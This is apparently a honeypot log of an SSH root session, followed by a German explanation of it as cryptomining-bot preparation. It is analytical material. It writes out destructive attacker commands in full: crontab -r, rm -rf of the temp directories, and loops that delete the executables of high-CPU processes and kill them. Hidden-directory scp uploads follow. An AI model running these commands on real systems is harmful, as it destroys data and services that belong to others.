30.09.2026, 02:54 UTC · 942 Befehle · über ssh · Vereinigte Staaten
user='root' pass='******' root@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01 root@srv01:~$ uname -m | awk '{printf $1}' x86_64 root@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }' 262 days, 04:12 root@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01 root@srv01:~$ lspci | egrep VGA && lspci | grep 3D bash: lspci: command not found root@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14- Intel(R) Xeon(R) CPU E5-2650 v3 @ 2.30GHz root@srv01:~$ curl ipinfo.io/org AS14618 root@srv01:~$ curl ipinfo.io/org Cloudflare, Inc. root@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1 bash: nvidia-smi: command not found root@srv01:~$ nvidia-smi -q | grep "Product Name" bash: nvidia-smi: command not found root@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1 0 root@srv01:~$ uname -n | awk '{printf $1}' web01 root@srv01:~$ uname -r | awk '{printf $1}' 5.4.0-150-generic root@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d… root@srv01:~$ echo 1234 > /tmp/d.log root@srv01:~$ scp -qt "/var/tmp/HoitzADq" root@srv01:~$ scp -qt "/tmp/HoitzADq" root@srv01:~$ scp -qt "/dev/shm/HoitzADq" root@srv01:~$ scp -qt "/dev/shm/HbVlnyni" root@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01 root@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d… bash: pidof: command not found root@srv01:~$ echo 123456 > /tmp/d.log root@srv01:~$ scp -qt "/var/tmp/vEjBpiuL" root@srv01:~$ scp -qt "/tmp/vEjBpiuL" root@srv01:~$ scp -qt "/dev/shm/vEjBpiuL" root@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01 root@srv01:~$ echo 12345678 > /tmp/d.log root@srv01:~$ scp -qt "/var/tmp/peUbddIS" root@srv01:~$ scp -qt "/tmp/peUbddIS" root@srv01:~$ scp -qt "/dev/shm/peUbddIS" root@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01 root@srv01:~$ echo 123456789 > /tmp/d.log root@srv01:~$ scp -qt "/var/tmp/oCUZvAwI" root@srv01:~$ scp -qt "/tmp/oCUZvAwI" root@srv01:~$ scp -qt "/dev/shm/oCUZvAwI" root@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01 root@srv01:~$ uname -s -v -n -r -m Linux 5.4.0-150-generic #176-Ubuntu SMP Wed Jun 3 13:09:49 UTC 2020 x86_64 web01 root@srv01:~$ echo admin > /tmp/d.log root@srv01:~$ scp -qt "/var/tmp/RqVbYtBF"
Ein Angreifer meldete sich über SSH mit dem Benutzernamen root und einem erratenen Passwort an. Er führte zunächst eine Reihe von Systemabfragen durch, um die Hardware, die CPU und die Netzwerkinformation zu ermitteln. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung, bevor er versuchte, Dateien über SCP in verschiedene Verzeichnisse zu kopieren.
Die Befehle uname und lscpu identifizieren das Betriebssystem und den Prozessor, um die Rechenleistung einzuschätzen. Die Abfrage von ipinfo.io klärt, ob es sich um einen Cloud-Server handelt, was für die Skalierung von Angriffen relevant ist. Der Befehl crontab -r löscht geplante Aufgaben, während rm -rf temporäre Verzeichnisse leert, um Platz zu schaffen. Die awk-Schleife identifiziert Prozesse mit hoher CPU-Nutzung und beendet diese gewaltsam, um die volle Leistung für eigene Zwecke zu nutzen. Die scp-Befehle versuchen, Dateien in versteckte oder flüchtige Speicherorte wie /dev/shm zu schreiben, was oft der Persistenz dient.
Das Vorgehen deutet stark auf die Vorbereitung für Kryptomining hin, da die GPU- und CPU-Informationen gezielt abgefragt wurden. Das Entfernen konkurrierender Prozesse und das Löschen von Temp-Dateien dient dazu, Ressourcen freizumachen und Spuren zu verwischen. Der Versuch, Dateien über SCP zu übertragen, ist typisch für das Einschleusen von Mining-Software oder Botnet-Agenten.
Dieses Muster ist sehr verbreitet und folgt einem automatisierten Skript, das auf die Ausnutzung schwacher Root-Passwörter spezialisiert ist. Die Kombination aus Hardware-Scan und Prozessbereinigung ist ein Standardverfahren für automatisierte Mining-Bots.